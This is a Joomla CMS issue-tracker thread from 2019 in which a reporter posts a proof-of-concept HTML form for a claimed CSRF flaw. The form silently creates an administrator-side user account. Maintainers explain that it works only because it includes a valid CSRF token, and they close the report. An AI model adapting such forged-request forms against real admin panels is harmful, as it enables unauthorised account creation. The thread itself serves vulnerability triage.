Feeling Lucky
?
[#26748] - It is one CSRF vulnerability that can add the account
- Closed
- 21 Oct 2019
- Medium
- Build: staging
- # 26748
### Steps to reproduce the issue
After the administrator logged in open the page
<html>
<body>
<form action="http://172.16.100.15/cms/administrator/index.php?option=com_users&layout=edit&id=0" method="POST" enctype="multipart/form-data">
<input type="hidden" name="jform[name]" value="test" />
<input type="hidden" name="jform[username]" value="test" />
<input type="hidden" name="jform[password]" value="test" />
<input type="hidden" name="jform[password2]" value="test" />
<input type="hidden" name="jform[email]" value="test2@qq.com" />
<input type="hidden" name="jform[registerDate]" value=" " />
<input type="hidden" name="jform[lastvisitDate]" value=" " />
<input type="hidden" name="jform[lastResetTime]" value=" " />
<input type="hidden" name="jform[resetCount]" value="0" />
<input type="hidden" name="jform[sendEmail]" value="0" />
<input type="hidden" name="jform[block]" value="0" />
<input type="hidden" name="jform[requireReset]" value="0" />
<input type="hidden" name="jform[id]" value="0" />
<input type="hidden" name="jform[groups][]" value="2" />
<input type="hidden" name="jform[params][admin_style]" value=" " />
<input type="hidden" name="jform[params][admin_language]" value=" " />
<input type="hidden" name="jform[params][language]" value=" " />
<input type="hidden" name="jform[params][editor]" value=" " />
<input type="hidden" name="jform[params][timezone]" value=" " />
<input type="hidden" name="task" value="user.apply" />
<input type="hidden" name="c974c45d533f4be963804a5d041a86a8" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
A user is added
Recommended verification HTTP Referer
Expected result
Actual result
System information (as much as possible)
Additional comments
joomla-cms-bot
- | Labels |
Added:
?
|
||
| Status | New | ⇒ | Closed |
| Closed_Date | 0000-00-00 00:00:00 | ⇒ | 2019-10-21 03:02:30 |
| Closed_By | ⇒ | yuzezheng416 |
| Status | Closed | ⇒ | New |
| Closed_Date | 2019-10-21 03:02:30 | ⇒ | |
| Closed_By | yuzezheng416 | ⇒ |
yuzezheng416
- comment
- 21 Oct 2019
I can successfully add user in the local test, emm lack Verify the HTTP Referer field
SharkyKZ
- comment
- 21 Oct 2019
But you're logged in as admin?
SniperSister
- comment
- 21 Oct 2019
I can successfully add user in the local test
With the form shown above? Yes, of course you can, because it has a valid CSRF token! Remove that field from your payload and you won't be able to add a user because the token check fails.
SniperSister
- comment
- 21 Oct 2019
Side note:
Verify the HTTP Referer field
Verifying the referrer field does not protect you against CSRF attacks because the referrer is a user supplied input and can be easily changed to a value of your choice.
| Status | New | ⇒ | Closed |
| Closed_Date | 0000-00-00 00:00:00 | ⇒ | 2019-10-21 08:14:56 |
| Closed_By | ⇒ | SniperSister |
This IS the CSRF token and it's properly checked in the controller task, see
https://github.com/joomla/joomla-cms/blob/3.10-dev/libraries/src/MVC/Controller/FormController.php#L627
Do I miss something?